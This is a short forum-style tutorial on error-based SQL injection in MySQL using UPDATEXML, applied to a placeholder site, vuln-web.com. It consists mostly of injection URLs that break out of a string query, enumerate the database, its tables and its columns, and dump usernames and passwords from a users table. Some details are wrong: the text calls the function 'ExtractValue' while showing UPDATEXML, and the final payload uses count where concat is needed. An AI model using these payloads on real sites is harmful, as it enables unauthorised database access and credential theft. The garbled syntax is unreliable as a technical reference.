Error Based Injection using UpdateXML

[Aerosol]

Credit's to :Diku

The “ExtractValue” function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form:

UPDATEXML(XMLType_Instance, XPath_string,value_expression, namespace_string)

If the XPath query is syntactically incorrect, we are presented with an error message:

XPATH syntax error: ‘xpathqueryhere’

We use it in the same condition like other error based injections but sometimes if Extractvalue is not available or filtered by the firewall then we can use this one. When we try Union based query first step and do not get any output then we can try using Error based injection. For Example we used the below query and got no output.

www.vuln-web.com/index.php?view=-35" union select 1,2,3,4,5--

As you can see the double quote over there..that means this time we are injecting into a string type query where the query is like. Now we can easily assume the internal query.

Query:

select path from pages where view="<our_input_here>" limit 1,1;

So let us continue our injection using XPATH updateXML injection.

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(<b>OUR QUERY HERE</b>)),null)--

Getting the Current Database :

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(0x0a,(select database()))),null)--

Output : XPATH syntax error: ‘:database_name_here’

as we got the Database let us continue Big Grin

Getting tables in current Database:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--

Output : XPATH syntax error:‘:table_name_here’

as you can see i used limit as we cannot extract long data which limits upto 32 characters. So i prefer Tongue to go one by one increasing the row to get the output. well if you want to dump the database go for any tool or manual proxy else create your own script to get the data dumped for you which I prefer to be the best option.

So Now lets assume we got the following tables using the above Query:

• Posts
  
• Assets
  
• Banner
  
• Links
  
• Users
  

Let us continue and try to get the columns:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),null)--

Output : XPATH syntax error: ‘:column_name_here’

Let Us say we got the 3 Columns:

• id
  
• username
  
• password
  

Let us Dump the data from them, but before that lets count the number of Columns.

Counting the number of columns:

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username) from users)),null)--

You can use the same trick to count the tables or columns also. So now let us continue dumping the data

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username,0x3a,password) from users limit 0,1)),null)--

Output : XPATH syntax error: ‘:Output_here’